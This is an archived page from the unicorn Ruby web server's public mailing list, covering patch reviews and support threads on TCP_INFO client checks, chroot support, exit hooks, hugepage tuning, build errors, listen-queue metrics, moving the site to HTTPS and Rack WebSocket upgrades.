>   tcp_info = socket.getsockopt(Socket::SOL_TCP, Socket::TCP_INFO)
>   state = tcp_info.unpack("c")[0]
>   state == TCP_CLOSE || state == TCP_CLOSE_WAIT
> end

+Cc: raindrops-public@bogomips.org -> https://bogomips.org/raindrops-public/

Fwiw, raindrops (already a dependency of unicorn) has TCP_INFO
support under Linux:

https://bogomips.org/raindrops.git/tree/ext/raindrops/linux_tcp_info.c

I haven't used it, much, but FreeBSD also implements a subset of
this feature, nowadays, and ought to be supportable, too.  We
can look into adding it for raindrops.

I don't know about other BSDs...

> This could be called at the top of `#process_client` in `http_server.rb`.
> 
> Would there be interest in this upstream? Any comments on this
> proposed implementation? Currently, we're using a middleware with the
> Rack hijack API, but this seems like it belongs at the webserver
> level.

I guess hijack means you have to discard other middlewares and
the normal rack response handling in unicorn?  If so, ouch!

Unfortunately, without hijack, there's no portable way in Rack
to get at the underlying IO object; so I guess this needs to
be done at the server level...

So yeah, I guess it belongs in the webserver.

I think we can automatically use TCP_INFO if available for
check_client_connection; then fall back to the old early write
hack for Unix sockets and systems w/o TCP_INFO (which would set
the response_start_sent flag).

No need to introduce yet another configuration option.
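
(Rough sketch of the automatic selection; the hard-coded state
values are from include/net/tcp_states.h and only for illustration,
this is not a finished implementation:)

  TCP_CLOSE      = 7 # illustrative constants, not defined by Ruby
  TCP_CLOSE_WAIT = 8

  def client_gone?(client)
    if defined?(Raindrops::TCP_Info) && TCPSocket === client
      state = Raindrops::TCP_Info.new(client).state
      state == TCP_CLOSE || state == TCP_CLOSE_WAIT
    else
      false # caller falls back to the early write hack
    end
  end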

^ permalink raw reply	[relevance 2%]

* Re: Patch: Add support for chroot to Worker#user
  @ 2017-02-21 20:15  3%   ` Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2017-02-21 20:15 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On 02/21 07:53, Eric Wong wrote:
> Jeremy Evans <code@jeremyevans.net> wrote:
> > Any chrooting would need to happen inside Worker#user, because
> > you can't chroot until after you have parsed the list of groups,
> > and you must chroot before dropping root privileges.
> > 
> > chroot is an important security feature, so that if the unicorn
> > process is exploited, file system access is limited to the chroot
> > directory instead of the entire system.
> 
> I'm hesitant to document this as "an important security feature".
> 
> Perhaps "an extra layer of security" is more accurate,
> as there are ways of breaking out of a chroot.

That's fine.  Note that while breaking out of a chroot is easy if you
have root privileges, it is difficult to break out of a chroot
if root privileges have been dropped.  There are a couple of
possibilities listed at https://github.com/earthquake/chw00t, neither of
which is likely in environments where unicorn is typically deployed.

> 
> > This is not a complete patch as it does not include tests. I can
> > add tests if you would consider accepting this feature.
> 
> I wouldn't worry about automated tests if elevated privileges
> are required.
> 
> > -  # Changes the worker process to the specified +user+ and +group+
> > +  # Changes the worker process to the specified +user+ and +group+,
> > +  # and chroots to the current working directory if +chroot+ is set.
> >    # This is only intended to be called from within the worker
> >    # process from the +after_fork+ hook.  This should be called in
> >    # the +after_fork+ hook after any privileged functions need to be
> > @@ -123,7 +124,7 @@ def close # :nodoc:
> >    # directly back to the caller (usually the +after_fork+ hook.
> >    # These errors commonly include ArgumentError for specifying an
> >    # invalid user/group and Errno::EPERM for insufficient privileges
> > -  def user(user, group = nil)
> > +  def user(user, group = nil, chroot = false)
> >      # we do not protect the caller, checking Process.euid == 0 is
> >      # insufficient because modern systems have fine-grained
> >      # capabilities.  Let the caller handle any and all errors.
> > @@ -134,6 +135,10 @@ def user(user, group = nil)
> >        Process.initgroups(user, gid)
> >        Process::GID.change_privilege(gid)
> >      end
> > +    if chroot
> > +      Dir.chroot(Dir.pwd)
> > +      Dir.chdir('/')
> > +    end
> 
> Perhaps this can be made more flexible by allowing chroot to
> any specified directory, not just pwd.  Something like:
> 
>     chroot = Dir.pwd if chroot == true
>     if chroot
>       Dir.chroot(chroot)
>       Dir.chdir('/')
>     end
> 
> Anyways I'm inclined to accept this feature.

I had basically the same code originally, but wanted to minimize the API
surface to increase the likelihood of acceptance.  So I'm definitely in
favor of that change.

Thanks,
Jeremy


^ permalink raw reply	[relevance 3%]

* Re: Patch: Add after_worker_exit configuration option
  2017-02-21 19:43  3% ` Eric Wong
@ 2017-02-21 20:02  0%   ` Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2017-02-21 20:02 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On 02/21 07:43, Eric Wong wrote:
> Jeremy Evans <code@jeremyevans.net> wrote:
> > This option can be used to implement custom behavior for handling
> > worker exits.  For example, let's say you have a specific request
> > that crashes a worker process, which you expect to be due to a
> > improperly programmed C extension. By modifying your worker to
> > save request related data in a temporary file and using this option,
> > you can get a record of what request is crashing the application,
> > which will make debugging easier.
> > 
> > This is not a complete patch as it doesn't include tests, but
> > before writing tests I wanted to see if this is something you'd
> > consider including in unicorn.
> 
> What advantage does this have over Ruby's builtin at_exit?

at_exit is not called if the interpreter crashes:

ruby -e 'at_exit{File.write("a.txt", "a")}; Process.kill :SEGV, $$' 2>/dev/null
([ -f a.txt ] && echo at_exit called) || echo at_exit not called

> 
> AFAIK, at_exit may be registered inside after_fork hooks to the
> same effect.
> 
> Thanks.

^ permalink raw reply	[relevance 0%]

* Re: Patch: Add after_worker_exit configuration option
  @ 2017-02-21 19:43  3% ` Eric Wong
  2017-02-21 20:02  0%   ` Jeremy Evans
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-02-21 19:43 UTC (permalink / raw)
  To: Jeremy Evans; +Cc: unicorn-public

Jeremy Evans <code@jeremyevans.net> wrote:
> This option can be used to implement custom behavior for handling
> worker exits.  For example, let's say you have a specific request
> that crashes a worker process, which you expect to be due to a
> improperly programmed C extension. By modifying your worker to
> save request related data in a temporary file and using this option,
> you can get a record of what request is crashing the application,
> which will make debugging easier.
> 
> This is not a complete patch as it doesn't include tests, but
> before writing tests I wanted to see if this is something you'd
> consider including in unicorn.

What advantage does this have over Ruby's builtin at_exit?

AFAIK, at_exit may be registered inside after_fork hooks to the
same effect.
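
(e.g., something like this in the config file:)

  after_fork do |server, worker|
    at_exit { server.logger.info("worker #{worker.nr} exiting") }
  end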

Thanks.

^ permalink raw reply	[relevance 3%]

* [RFC] TUNING: document THP caveat for Linux users
@ 2016-11-29  0:00  6% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2016-11-29  0:00 UTC (permalink / raw)
  To: unicorn-public

This probably applies to other kernels, too, but I'm most
familiar with Linux.
---
 It took me a while to get the wording below to this point.
 Maybe there's not enough detail for folks unfamiliar with
 how OSes work, or maybe there's too much and it will be TL;DR-ed...

 TUNING | 20 +++++++++++++++++++-
 1 file changed, 19 insertions(+), 1 deletion(-)

diff --git a/TUNING b/TUNING
index 247090b..1f55228 100644
--- a/TUNING
+++ b/TUNING
@@ -72,10 +72,28 @@ See Unicorn::Configurator for details on the config file format.
   have them unbuffered (File#sync = true) or they are
   record(line)-buffered in userspace before any writes.
 
-== Kernel Parameters (Linux sysctl)
+== Kernel Parameters (Linux sysctl and sysfs)
 
 WARNING: Do not change system parameters unless you know what you're doing!
 
+* Transparent hugepages (THP) improves performance in many cases,
+  but can also increase memory use when relying on a
+  copy-on-write(CoW)-friendly GC (Ruby 2.0+) with "preload_app true".
+  CoW operates at the page level, so writing to a huge page would
+  trigger a 2 MB copy (x86-64), as opposed to a 4 KB copy on a
+  regular (non-huge) page.
+
+  Consider only allowing THP to be used when requested via the
+  madvise(2) syscall:
+
+	echo madvise >/sys/kernel/mm/transparent_hugepage/enabled
+
+  Or disabling it system-wide, via "never".
+
+  n.b. "page" in this context only applies to the OS kernel,
+  Ruby GC implementations also use this term for the same concept
+  in a way that is agnostic to the OS.
+
 * net.core.rmem_max and net.core.wmem_max can increase the allowed
   size of :rcvbuf and :sndbuf respectively. This is mostly only useful
   for UNIX domain sockets which do not have auto-tuning buffer sizes.
-- 
EW

^ permalink raw reply related	[relevance 6%]

* Build error of 5.1.0 due to RString
@ 2016-11-07 17:13  2% Olivier FAURAX
  0 siblings, 0 replies; 200+ results
From: Olivier FAURAX @ 2016-11-07 17:13 UTC (permalink / raw)
  To: unicorn-public

Hello,

I'm new to Ruby & Unicorn, and I get a build error trying to compile 
unicorn 5.1.0.

The error is about struct RString missing some members, so perhaps an
API has changed somewhere.
I tried with unicorn 5.2.0, and I get the same error.

Thanks in advance
Olivier

$ uname -a
Linux git.example.com 3.16.0-76-generic #98~14.04.1-Ubuntu SMP Fri Jun 
24 17:04:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

$ ruby --version
ruby 2.1.9p490 (2016-03-30 revision 54437) [x86_64-linux]

$ gem install unicorn -v '5.1.0' -i vendor/bundle/ruby/2.1.0 --verbose
GET https://api.rubygems.org/specs.4.8.gz
200 OK
HEAD https://api.rubygems.org/api/v1/dependencies
200 OK
GET https://api.rubygems.org/api/v1/dependencies?gems=unicorn
200 OK
GET https://api.rubygems.org/api/v1/dependencies?gems=raindrops
200 OK
GET https://api.rubygems.org/api/v1/dependencies?gems=kgio
200 OK
/opt/bitnami/apps/gitlab/htdocs/vendor/bundle/ruby/2.1.0/gems/unicorn-5.1.0/.CHANGELOG.old
...
[long list of unicorn-5.1.0 files]
...
/opt/bitnami/apps/gitlab/htdocs/vendor/bundle/ruby/2.1.0/gems/unicorn-5.1.0/unicorn.gemspec
Building native extensions.  This could take a while...
/opt/bitnami/ruby/bin/ruby extconf.rb
checking for SIZEOF_OFF_T in ruby.h... yes
checking for SIZEOF_SIZE_T in ruby.h... yes
checking for SIZEOF_LONG in ruby.h... yes
checking for rb_str_set_len() in ruby.h... no
checking for rb_hash_clear() in ruby.h... no
checking for gmtime_r() in time.h... yes
creating Makefile
make "DESTDIR=" clean
make "DESTDIR="
compiling httpdate.c
compiling unicorn_http.c
In file included from unicorn_http.rl:8:0:
ext_help.h: In function ‘rb_18_str_set_len’:
ext_help.h:18:15: error: ‘struct RString’ has no member named ‘len’
    RSTRING(str)->len = len;
                ^
ext_help.h:19:15: error: ‘struct RString’ has no member named ‘ptr’
    RSTRING(str)->ptr[len] = '\0';
                ^
make: *** [unicorn_http.o] Error 1
ERROR:  Error installing unicorn:
         ERROR: Failed to build gem native extension.

     Building has failed. See above output for more information on the 
failure.
make failed, exit code 2

Gem files will remain installed in 
/opt/bitnami/apps/gitlab/htdocs/vendor/bundle/ruby/2.1.0/gems/unicorn-5.1.0 
for inspection.
Results logged to 
/opt/bitnami/apps/gitlab/htdocs/vendor/bundle/ruby/2.1.0/extensions/x86_64-linux/2.1.0-static/unicorn-5.1.0/gem_make.out

^ permalink raw reply	[relevance 2%]

* Re: Master wait time metric
  2016-10-31 23:36  3% ` Eric Wong
@ 2016-11-01  8:21  0%   ` Sam Saffron
  0 siblings, 0 replies; 200+ results
From: Sam Saffron @ 2016-11-01  8:21 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Brilliant, this will make it super easy to write a Prometheus
exporter, will post here once I am done.

On Tue, Nov 1, 2016 at 10:36 AM, Eric Wong <e@80x24.org> wrote:
> Sam Saffron <sam.saffron@gmail.com> wrote:
>> Hi Eric / everyone :)
>>
>> I would like to start graphing how long our master process spends
>> waiting for worker processes to be available.
>
> Fwiw, the master doesn't wait for workers to become available for
> processing requests.  But I think I know what you mean to ask :>
>
> Rather, the connection request sits in the listen queue (a kernel
> object) shared by all workers, and instrumenting this is always
> kernel-dependent (because unicorn avoids doing stuff in userspace).
>
>> This metric will allow us to quickly tell if a unicorn is being
>> overloaded and allow us to quickly remediate.
>>
>> Once a minute I want to ask the master process how long it spent
>> waiting for child processes to become available.
>>
>> How would I go about getting that metric?
>
> Linux-only, but you can probably look at Raindrops::LastDataRecv
>
>         https://bogomips.org/raindrops/Raindrops/LastDataRecv.html
>
> Raindrops::Middleware can give you how big the listen queue is,
> too.  Ideally, this should never exceed 1.
>
>         https://bogomips.org/raindrops/Raindrops/Middleware.html
>
>
> You can probably get the same metrics directly from the kernel
> via systemtap, dtrace, or similar, too.

^ permalink raw reply	[relevance 0%]

* Re: Master wait time metric
  @ 2016-10-31 23:36  3% ` Eric Wong
  2016-11-01  8:21  0%   ` Sam Saffron
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2016-10-31 23:36 UTC (permalink / raw)
  To: Sam Saffron; +Cc: unicorn-public

Sam Saffron <sam.saffron@gmail.com> wrote:
> Hi Eric / everyone :)
> 
> I would like to start graphing how long our master process spends
> waiting for worker processes to be available.

Fwiw, the master doesn't wait for workers to become available for
processing requests.  But I think I know what you mean to ask :>

Rather, the connection request sits in the listen queue (a kernel
object) shared by all workers, and instrumenting this is always
kernel-dependent (because unicorn avoids doing stuff in userspace).

> This metric will allow us to quickly tell if a unicorn is being
> overloaded and allow us to quickly remediate.
> 
> Once a minute I want to ask the master process how long it spent
> waiting for child processes to become available.
> 
> How would I go about getting that metric?

Linux-only, but you can probably look at Raindrops::LastDataRecv

	https://bogomips.org/raindrops/Raindrops/LastDataRecv.html

Raindrops::Middleware can give you how big the listen queue is,
too.  Ideally, this should never exceed 1.

	https://bogomips.org/raindrops/Raindrops/Middleware.html


You can probably get the same metrics directly from the kernel
via systemtap, dtrace, or similar, too.
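
(For the middleware route, wiring it up is roughly this in config.ru;
"/_raindrops" is the middleware's default stats endpoint:)

  require 'raindrops'
  use Raindrops::Middleware # exposes calling/writing counts + listener queues
  run ->(env) { [200, { 'Content-Type' => 'text/plain' }, ["hi\n"]] }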

^ permalink raw reply	[relevance 3%]

* [PATCH] relocate website to https://bogomips.org/unicorn/
@ 2016-10-25 22:25  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2016-10-25 22:25 UTC (permalink / raw)
  To: unicorn-public

HTTPS helps some with reader privacy and Let's Encrypt seems to
be working well enough the past few months.

This change will allow us to reduce subjectAltName bloat in our
TLS certificate over time.  It will also promote domain name
agility to support mirrors or migrations to other domains
(including a Tor hidden service mirror).

http://bogomips.org/unicorn/ will remain available for people on
legacy systems without usable TLS.  There is no plan for automatic
redirecting from HTTP to HTTPS at this time.
---

 I'm not sure when I'll remove "unicorn.bogomips.org"
 subjectAltName from the TLS certificate, yet, hopefully
 within a year; but maybe that's optimistic

 I never actually advertised the HTTPS site for this project
 before today, but search engines picked it up.  Oh well :<

 .olddoc.yml                       |  6 +++---
 Documentation/unicorn.1.txt       |  4 ++--
 Documentation/unicorn_rails.1.txt |  4 ++--
 GNUmakefile                       |  4 ++--
 HACKING                           |  2 +-
 ISSUES                            | 12 ++++++------
 Links                             |  4 ++--
 README                            |  4 ++--
 SIGNALS                           |  2 +-
 examples/big_app_gc.rb            |  2 +-
 examples/nginx.conf               |  2 +-
 examples/unicorn.conf.minimal.rb  |  4 ++--
 examples/unicorn.conf.rb          |  4 ++--
 lib/unicorn/configurator.rb       |  6 +++---
 lib/unicorn/http_server.rb        |  2 +-
 15 files changed, 31 insertions(+), 31 deletions(-)

diff --git a/.olddoc.yml b/.olddoc.yml
index c4a9236..ee2d306 100644
--- a/.olddoc.yml
+++ b/.olddoc.yml
@@ -1,8 +1,8 @@
 ---
-cgit_url: http://bogomips.org/unicorn.git
+cgit_url: https://bogomips.org/unicorn.git
 git_url: git://bogomips.org/unicorn.git
-rdoc_url: http://unicorn.bogomips.org/
-ml_url: http://bogomips.org/unicorn-public/
+rdoc_url: https://bogomips.org/unicorn/
+ml_url: https://bogomips.org/unicorn-public/
 merge_html:
   unicorn_1: Documentation/unicorn.1.html
   unicorn_rails_1: Documentation/unicorn_rails.1.html
diff --git a/Documentation/unicorn.1.txt b/Documentation/unicorn.1.txt
index 3f20a9a..e692078 100644
--- a/Documentation/unicorn.1.txt
+++ b/Documentation/unicorn.1.txt
@@ -181,7 +181,7 @@ the unicorn config file.
 * [Rack RDoc][2]
 * [Rackup HowTo][3]
 
-[1]: http://unicorn.bogomips.org/
+[1]: https://bogomips.org/unicorn/
 [2]: http://www.rubydoc.info/github/rack/rack/
 [3]: https://github.com/rack/rack/wiki/tutorial-rackup-howto
-[4]: http://unicorn.bogomips.org/SIGNALS.html
+[4]: https://bogomips.org/unicorn/SIGNALS.html
diff --git a/Documentation/unicorn_rails.1.txt b/Documentation/unicorn_rails.1.txt
index 2ce7501..088e2ff 100644
--- a/Documentation/unicorn_rails.1.txt
+++ b/Documentation/unicorn_rails.1.txt
@@ -169,7 +169,7 @@ used by Unicorn.
 * [Rack RDoc][2]
 * [Rackup HowTo][3]
 
-[1]: http://unicorn.bogomips.org/
+[1]: https://bogomips.org/unicorn/
 [2]: http://www.rubydoc.info/github/rack/rack/
 [3]: https://github.com/rack/rack/wiki/tutorial-rackup-howto
-[4]: http://unicorn.bogomips.org/SIGNALS.html
+[4]: https://bogomips.org/unicorn/SIGNALS.html
diff --git a/GNUmakefile b/GNUmakefile
index 3f9c441..bc9c643 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -183,13 +183,13 @@ doc: .document $(ext)/unicorn_http.c man html .olddoc.yml $(PLACEHOLDERS)
 	install -m644 $(man1_paths) doc/
 	tar cf - $$(git ls-files examples/) | (cd doc && tar xf -)
 
-# publishes docs to http://unicorn.bogomips.org
+# publishes docs to https://bogomips.org/unicorn/
 publish_doc:
 	-git set-file-times
 	$(MAKE) doc
 	$(MAKE) doc_gz
 	chmod 644 $$(find doc -type f)
-	$(RSYNC) -av doc/ unicorn.bogomips.org:/srv/unicorn/
+	$(RSYNC) -av doc/ bogomips.org:/srv/bogomips/unicorn/
 	git ls-files | xargs touch
 
 # Create gzip variants of the same timestamp as the original so nginx
diff --git a/HACKING b/HACKING
index 0fa22cd..d55f1c7 100644
--- a/HACKING
+++ b/HACKING
@@ -57,7 +57,7 @@ Please wrap documentation at 72 characters-per-line or less (long URLs
 are exempt) so it is comfortably readable from terminals.
 
 When referencing mailing list posts, use
-<tt>http://bogomips.org/unicorn-public/$MESSAGE_ID/</tt> if possible
+<tt>https://bogomips.org/unicorn-public/$MESSAGE_ID/</tt> if possible
 since the Message-ID remains searchable even if a particular site
 becomes unavailable.
 
diff --git a/ISSUES b/ISSUES
index 21bd013..291441a 100644
--- a/ISSUES
+++ b/ISSUES
@@ -2,8 +2,8 @@
 
 mailto:unicorn-public@bogomips.org is the best place to report bugs,
 submit patches and/or obtain support after you have searched the
-{email archives}[http://bogomips.org/unicorn-public/] and
-{documentation}[http://unicorn.bogomips.org/].
+{email archives}[https://bogomips.org/unicorn-public/] and
+{documentation}[https://bogomips.org/unicorn/].
 
 * No subscription will ever be required to email us
 * Cc: all participants in a thread or commit, as subscription is optional
@@ -12,7 +12,7 @@ submit patches and/or obtain support after you have searched the
 * Do not send HTML mail or images, it will be flagged as spam
 * Anonymous and pseudonymous messages will always be welcome.
 * The email submission port (587) is enabled on the bogomips.org MX:
-  http://bogomips.org/unicorn-public/20141004232241.GA23908@dcvr.yhbt.net/t/
+  https://bogomips.org/unicorn-public/20141004232241.GA23908@dcvr.yhbt.net/t/
 
 If your issue is of a sensitive nature or you're just shy in public,
 then feel free to email us privately at mailto:unicorn@bogomips.org
@@ -67,7 +67,7 @@ document distributed with git) on guidelines for patch submission.
 * private: mailto:unicorn@bogomips.org
 * nntp://news.gmane.org/gmane.comp.lang.ruby.unicorn.general
 * nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn
-* http://bogomips.org/unicorn-public/
+* https://bogomips.org/unicorn-public/
 
 Mailing list subscription is optional, so Cc: all participants.
 
@@ -78,9 +78,9 @@ You can follow along via NNTP:
 
 Or Atom feeds:
 
-	http://bogomips.org/unicorn-public/new.atom
+	https://bogomips.org/unicorn-public/new.atom
 
-	The HTML archives at http://bogomips.org/unicorn-public/
+	The HTML archives at https://bogomips.org/unicorn-public/
 	also has links to per-thread Atom feeds and downloadable
 	mboxes.
 
diff --git a/Links b/Links
index 6474a9d..7c113c8 100644
--- a/Links
+++ b/Links
@@ -26,7 +26,7 @@ or services behind them.
 * {raindrops}[http://raindrops.bogomips.org/] - real-time stats for
   preforking Rack servers
 
-* {UnXF}[http://bogomips.org/unxf/]  Un-X-Forward* the Rack environment,
+* {UnXF}[https://bogomips.org/unxf/]  Un-X-Forward* the Rack environment,
   useful since unicorn is designed to be deployed behind a reverse proxy.
 
 === unicorn is written to work with
@@ -52,5 +52,5 @@ or services behind them.
 * {Mongrel}[http://rubygems.org/gems/mongrel] - the awesome webserver
   unicorn is based on
 
-* {david}[http://bogomips.org/david.git] - a tool to explain why you need
+* {david}[https://bogomips.org/david.git] - a tool to explain why you need
   nginx in front of unicorn
diff --git a/README b/README
index 8079f37..29e04b4 100644
--- a/README
+++ b/README
@@ -82,7 +82,7 @@ You can get the latest source via git from the following locations
 
 You may browse the code from the web:
 
-* http://bogomips.org/unicorn.git
+* https://bogomips.org/unicorn.git
 * http://repo.or.cz/w/unicorn.git (gitweb)
 
 See the HACKING guide on how to contribute and build prerelease gems
@@ -128,7 +128,7 @@ All feedback (bug reports, user/development dicussion, patches, pull
 requests) go to the mailing list/newsgroup.  See the ISSUES document for
 information on the {mailing list}[mailto:unicorn-public@bogomips.org].
 
-The mailing list is archived at http://bogomips.org/unicorn-public/
+The mailing list is archived at https://bogomips.org/unicorn-public/
 Read-only NNTP access is available at:
 nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn and
 nntp://news.gmane.org/gmane.comp.lang.ruby.unicorn.general
diff --git a/SIGNALS b/SIGNALS
index 4d78065..1af851d 100644
--- a/SIGNALS
+++ b/SIGNALS
@@ -8,7 +8,7 @@ should be possible to easily share process management scripts between
 Unicorn and nginx.
 
 One example init script is distributed with unicorn:
-http://unicorn.bogomips.org/examples/init.sh
+https://bogomips.org/unicorn/examples/init.sh
 
 === Master Process
 
diff --git a/examples/big_app_gc.rb b/examples/big_app_gc.rb
index c4c8b04..9d05719 100644
--- a/examples/big_app_gc.rb
+++ b/examples/big_app_gc.rb
@@ -1,2 +1,2 @@
-# see {Unicorn::OobGC}[http://unicorn.bogomips.org/Unicorn/OobGC.html]
+# see {Unicorn::OobGC}[https://bogomips.org/unicorn/Unicorn/OobGC.html]
 # Unicorn::OobGC was broken in Unicorn v3.3.1 - v3.6.1 and fixed in v3.6.2
diff --git a/examples/nginx.conf b/examples/nginx.conf
index 0583c1f..e25712f 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -112,7 +112,7 @@ http {
     # try_files directive appeared in in nginx 0.7.27 and has stabilized
     # over time.  Older versions of nginx (e.g. 0.6.x) requires
     # "if (!-f $request_filename)" which was less efficient:
-    # http://bogomips.org/unicorn.git/tree/examples/nginx.conf?id=v3.3.1#n127
+    # https://bogomips.org/unicorn.git/tree/examples/nginx.conf?id=v3.3.1#n127
     try_files $uri/index.html $uri.html $uri @app;
 
     location @app {
diff --git a/examples/unicorn.conf.minimal.rb b/examples/unicorn.conf.minimal.rb
index 2a47910..2d1bf0a 100644
--- a/examples/unicorn.conf.minimal.rb
+++ b/examples/unicorn.conf.minimal.rb
@@ -1,9 +1,9 @@
 # Minimal sample configuration file for Unicorn (not Rack) when used
 # with daemonization (unicorn -D) started in your working directory.
 #
-# See http://unicorn.bogomips.org/Unicorn/Configurator.html for complete
+# See https://bogomips.org/unicorn/Unicorn/Configurator.html for complete
 # documentation.
-# See also http://unicorn.bogomips.org/examples/unicorn.conf.rb for
+# See also https://bogomips.org/unicorn/examples/unicorn.conf.rb for
 # a more verbose configuration using more features.
 
 listen 2007 # by default Unicorn listens on port 8080
diff --git a/examples/unicorn.conf.rb b/examples/unicorn.conf.rb
index 1e05cbb..d2897ef 100644
--- a/examples/unicorn.conf.rb
+++ b/examples/unicorn.conf.rb
@@ -2,10 +2,10 @@
 #
 # This configuration file documents many features of Unicorn
 # that may not be needed for some applications. See
-# http://unicorn.bogomips.org/examples/unicorn.conf.minimal.rb
+# https://bogomips.org/unicorn/examples/unicorn.conf.minimal.rb
 # for a much simpler configuration file.
 #
-# See http://unicorn.bogomips.org/Unicorn/Configurator.html for complete
+# See https://bogomips.org/unicorn/Unicorn/Configurator.html for complete
 # documentation.
 
 # Use at least one worker per core if you're on a dedicated server,
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index 948c6e3..3329c10 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -3,11 +3,11 @@
 
 # Implements a simple DSL for configuring a unicorn server.
 #
-# See http://unicorn.bogomips.org/examples/unicorn.conf.rb and
-# http://unicorn.bogomips.org/examples/unicorn.conf.minimal.rb
+# See https://bogomips.org/unicorn/examples/unicorn.conf.rb and
+# https://bogomips.org/unicorn/examples/unicorn.conf.minimal.rb
 # example configuration files.  An example config file for use with
 # nginx is also available at
-# http://unicorn.bogomips.org/examples/nginx.conf
+# https://bogomips.org/unicorn/examples/nginx.conf
 #
 # See the link:/TUNING.html document for more information on tuning unicorn.
 class Unicorn::Configurator
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 741cca5..35bd100 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -6,7 +6,7 @@
 # forked worker children.
 #
 # Users do not need to know the internals of this class, but reading the
-# {source}[http://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb]
+# {source}[https://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb]
 # is education for programmers wishing to learn how unicorn works.
 # See Unicorn::Configurator for information on how to configure unicorn.
 class Unicorn::HttpServer
-- 
EW

^ permalink raw reply related	[relevance 2%]

* Re: Please join the Rack Specification discussion for `env['upgrade.websocket']`
  @ 2016-08-06  3:09  3%   ` Boaz Segev
  0 siblings, 0 replies; 200+ results
From: Boaz Segev @ 2016-08-06  3:09 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Eric, thank you for your review and thoughts on the matter.

You raised a few questions, please allow me to both answer and clarify the intention behind the proposed extension.

>> I represent an effort to extend Rack so that it allows server-side
>> websocket upgrade implementation support and pure Rack websocket
>> applications.
>> 
>> This new Rack feature proposal is gaining support, with over 42
>> support votes in the [original Rack discussion
>> thread](https://github.com/rack/rack/issues/1093).
> 
> You mention performance several times, but I am not sure what
> you mean.  unicorn completely stops caring for a socket after
> it's hijacked by the app.  In other words:
> 
>  Your Rack app could take the socket and inject it into an
>  event loop running in a separate thread.  That event loop
>  could be 100% C code running without GVL for all unicorn
>  cares.


Running two (or more) event loops, each with its own resources, is wasteful and promotes needless context switches.

There is no reason to hijack a socket when the server can easily provide callbacks for IO-related events using its existing, established event loop.

This alone should provide a performance boost. There are other considerations as well, but I think they all derive from this core principle of having the web server retain control over all network IO concerns.

> Also, Ruby IO.select also supports arbitrary number of
> descriptors in some cases (Linux for sure, and probably most
> server-oriented *BSDs).  Of course, the malloc usage + O(n)
> behavior still suck, but no, select(2) is not always limited to
> <=1024 FDs.


Although this isn't as relevant to the proposed specification, it is a good example of how intricate network-programming details are unknown to most Ruby programmers, and it shows why it would be better for the web server to retain control over all network IO concerns.

For example, the Linux man page expressly states: "To monitor file descriptors greater than 1023, use poll(2) instead".

This is true even when using select for a single FD with a value greater than 1023, since `select` is often implemented using a bit vector of 1024 bits that is manipulated with the FD_* macros.

See, for example: http://linux-tips.org/t/is-it-possible-to-listen-file-descriptor-greater-than-1024-with-select/45/2

Ruby's IO.select uses this same system call and suffers the same issues that are present in the OS - each OS with its own quirks.
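
As a rough illustration (not part of the proposal; the padding trick below is contrived and assumes the process open-file limit is above ~1100), one could probe how a given Ruby/OS combination behaves once a descriptor crosses that boundary:

    # burn enough low-numbered descriptors so the next pipe lands above 1023
    pads = Array.new(1100) { File.open("/dev/null") }
    hi_r, hi_w = IO.pipe
    begin
      IO.select([hi_r], nil, nil, 0)
      puts "IO.select accepted fd #{hi_r.fileno} on this platform"
    rescue => e
      puts "IO.select failed on fd #{hi_r.fileno}: #{e.class}: #{e.message}"
    ensure
      (pads + [hi_r, hi_w]).each(&:close)
    end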

I don't think application developers should have to worry about these details when these issues were already resolved in the server's design.

By having the server provide callbacks - instead of hijacking - we eliminate a horde of potential bugs and considerations.

>  unicorn would only parse the first HTTP request (with the
>  Upgrade header) before the Rack app hijacks it.


Of course, not every server has to offer this feature - just like hijacking, it's optional.

Unicorn was designed for very specific use cases, so I definitely understand if this might not be as interesting for you.

However, I do think your experience as developers could help enrich us all. If you have any comments or anything to add regarding the proposed `websocket.upgrade` specification, your voice is welcome:

https://github.com/boazsegev/iodine/issues/6



^ permalink raw reply	[relevance 3%]

* [PATCH] examples/init.sh: update to reduce upgrade raciness
  @ 2016-06-07 21:13 10%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2016-06-07 21:13 UTC (permalink / raw)
  To: Jesper Rønn-Jensen; +Cc: unicorn-public

Jesper Rønn-Jensen <jesperrr@gmail.com> wrote:
> On Tue, Jun 7, 2016 at 3:41 PM, Eric Wong <e@80x24.org> wrote:
> > Jesper Rønn-Jensen <jesperrr@gmail.com> wrote:
> >> +++ b/examples/init.sh
> >> @@ -45,7 +45,7 @@ restart|reload)
> >>   $CMD
> >>   ;;
> >>  upgrade)
> >> - if sig USR2 && sleep 2 && sig 0 && oldsig QUIT
> >> + if sig USR2 && sleep 2 && sig 0
> >>   then
> >>   n=$TIMEOUT
> >>   while test -s $old_pid && test $n -ge 0
> >> --
> >
> > I actually wrote a better init script for a similar server,
> > patch coming in a bit (or later, close to falling asleep).
>
> Thanks for input.
> 
> I will close this issue and wait for your patch later, then.
 
Proposed patch below (for "git am --scissors" users)
I've pushed this out to the "jr/init" branch on the git repo
and you can download the blob directly, here:

https://bogomips.org/unicorn.git/plain/examples/init.sh?h=jr/init

Will rebase/amend this branch as necessary until merged into master.

> Will also close pull-request I put at github with reference to this thread.

Please do, thank you.

